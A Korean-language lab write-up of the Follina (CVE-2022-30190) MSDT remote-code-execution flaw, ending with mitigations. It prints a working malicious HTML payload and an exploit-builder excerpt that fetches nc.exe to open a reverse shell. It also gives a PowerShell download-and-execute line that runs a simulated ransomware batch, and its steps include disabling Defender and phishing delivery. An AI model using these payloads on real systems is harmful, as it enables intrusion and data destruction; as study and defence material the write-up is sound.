CVE-2022-30190 | Follina

취약점 개요

해당 취약점은 MS-MSDT URL 프로토콜을 사용할 때 msdt.exe를 통해 원격 코드 실행이 가능하다.

윈도우에서 응용 프로그램 및 HTML 링크가 사용자 지정 검색 기능인 search-ms라는 URI 프로토콜 핸들러를 지원하기 때문에 발생할 수 있다.

Microsoft 측에서는 현재 KB5014699 패치로 문제를 수정하였다고 하지만 취약점을 이용한 공격은 지속적으로 이루어지고 있다.

악성 샘플은 주로 MS Office 문서 파일을 통해 공격을 시작하게 되는데 악성 docx 파일에는 또 다른 악성 html 파일을 다운로드 하는 URL이 삽입되어있다.

해당 html 파일 내에는 앞서 설명한 MS-MSDT 프로토콜을 사용하는 URL로 리다이렉션하는 자바스크립트가 포함되어있다.

Windows는 docx 실행 이후 ms-msdt 프로토콜로 리다이렉션될 때 MSDT.EXE를 사용하게 되는데 이 때 공격자가 지정한 악성코드를 인자로 전달하여 실행하게 되는 것이다.

• 악성 html 파일

    ```html
    ...
            <script>
    /*
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/
    window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
    </script>
    </body>
    </html>
    ```
  

취약점에 영향 받는 버전

• KB5014699 패치 이전 버전

• MS Office 2021 등 여러 버전

취약점 시연

calc.exe

Name	Enviroment	IP
Attacker	Kali Linux	192.168.124.134
Victim	Windows 10 64bit 1903 MS Office 2021	192.168.124.132

• CVE-2022-30190 PoC

현재 사용하고 있는 환경에서는 Defender에서 해당 Exploit docx 파일을 악성 파일로 간주하고 있기에 위와 같이 실시간 보호를 해제하여 테스트를 진행합니다.

python3 exploit.py generate http://192.168.124.134:{port} 명령어를 사용하여 Kali에서 Exploit을 위한 docx 파일을 준비한다.

sudo python3 exploit.py host {port} 명령어를 통해 Kali에서 피해자의 접속 로그와 Connecting을 준비한다.

생성되는 파일은 ./out/document.docx에 존재하고 이 파일을 피싱이나 다른 매체를 통해 피해자에게 전달하게 된다. 피해자가 이 파일을 아무런 의심없이 실행하게 된다면 아래와 같이 MSDT가 실행되며 미리 정의해놓은 calc.exe가 실행되게 된다.

Remote shell 및 Ransomware

• Follina RCE

해당 git은 Remote Shell 연결을 위해 기존 calc.exe 명령어에서 그치지 않고 nc.exe 파일을 다운로드 받아 직접 Connecting을 시도하게 하는 RCE이다.

 with open(document_rels_path, "w") as filp:
        filp.write(external_referral)

    # Rebuild the original office file
    shutil.make_archive(args.output, "zip", doc_path)
    os.rename(args.output + ".zip", args.output)

    print(f"[+] created maldoc {args.output}")

    command = args.command
    if args.reverse:
        command = f"""Invoke-WebRequest https://github.com/JohnHammond/msdt-follina/blob/main/nc64.exe?raw=true -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""

    # Base64 encode our command so whitespace is respected
    base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")

    # Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
    html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""

이와 같이 command를 통해 Powershell을 통한 nc.exe 다운로드 및 Connecting을 진행한다.

기존 calc.exe의 Payload를 보게 되면 단순한 String 전달이 아닌 Base64 encoding을 진행하여 1차적인 난독화를 진행하는 것을 알 수 있다.

Kali로 돌아와 python3 follina.py -p {port} -l {listening port}를 수행하게 되면 follina.doc가 생성되는데 이 또한 피싱과 같이 피해자에게 전송을 진행한다.

이후 피해자 PC에서 해당 doc 파일을 통해 MSDT가 정상 실행된다면 아래와 같이 Session이 연결되게 된다.

또한 nc.exe 파일도 C:\Windows\Tasks 디렉토리에 정상적으로 다운로드 되어 있는 것을 확인할 수 있다.

현재 C:\USERS\USR\DESKTOP\TEST 디렉토리에는 위와 같이 테스트용 파일이 존재한다. 랜섬웨어 및 악성코드 실행 시 정상적으로 작동하는지 테스트를 진행합니다.

C:\USERS\USR\DESKTOP\TEST
│  1.txt
│  2.txt
│  3.txt
│  4.txt
│  5.txt
│
├─A
│  │  1.txt
│  │  2.txt
│  │  3.txt
│  │  4.txt
│  │  5.txt
│  │
│  └─C
│          1.txt
│          2.txt
│          3.txt
│          4.txt
│          5.txt
│
└─B
        1.txt
        2.txt
        3.txt
        4.txt
        5.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w 1 -noni -nop -c "(new-Object System.Net.WebClient).DownloadFile('http://{AttackIP}/extension_rename.bat','C:\Users\usr\Desktop\Test\extension_rename.bat');"&& cd C:\Users\usr\Desktop\Test&& extension_rename.bat

해당 명령어는 powershell.exe를 이용하여 공격자 서버의 파일을 다운로드 받아 실행시키는 코드로 실행하게 되면 Test 디렉토리 내 파일이 모두 변경되는 것을 확인할 수 있다.

C:\USERS\USR\DESKTOP\TEST
│  1.ransom
│  2.ransom
│  3.ransom
│  4.ransom
│  5.ransom
│  extension_rename.ransom
│
├─A
│  │  1.ransom
│  │  2.ransom
│  │  3.ransom
│  │  4.ransom
│  │  5.ransom
│  │
│  └─C
│          1.ransom
│          2.ransom
│          3.ransom
│          4.ransom
│          5.ransom
│
└─B
        1.ransom
        2.ransom
        3.ransom
        4.ransom
        5.ransom

대응 방안

• KB5014699 패치 적용

• 프로토콜 비활성화

  • 관리자 권한으로 명령어 프롬프트 실행.

  • reg export HKEY_CLASSES_ROOT\ms-msdt [백업 파일명] 명령어를 실행하여 레지스트리 백업.

  • reg delete HKEY_CLASSES_ROOT\ms-msdt /f 명령어를 실행하여 레지스트리 삭제.

• MSDT URL 프로토콜 레지스트리 복구

  • 관리자 권한으로 명령어 프롬프트 실행.

  • reg import [백업 파일명] 명령어를 실행하여 레지스트리 복구

Reference

• https://medium.com/@ashishsolankii/playing-with-follina-zero-day-from-poc-to-a-reverse-shell-ca1a1c0bf3f4

• https://github.com/JohnHammond/msdt-follina/tree/main?tab=readme-ov-file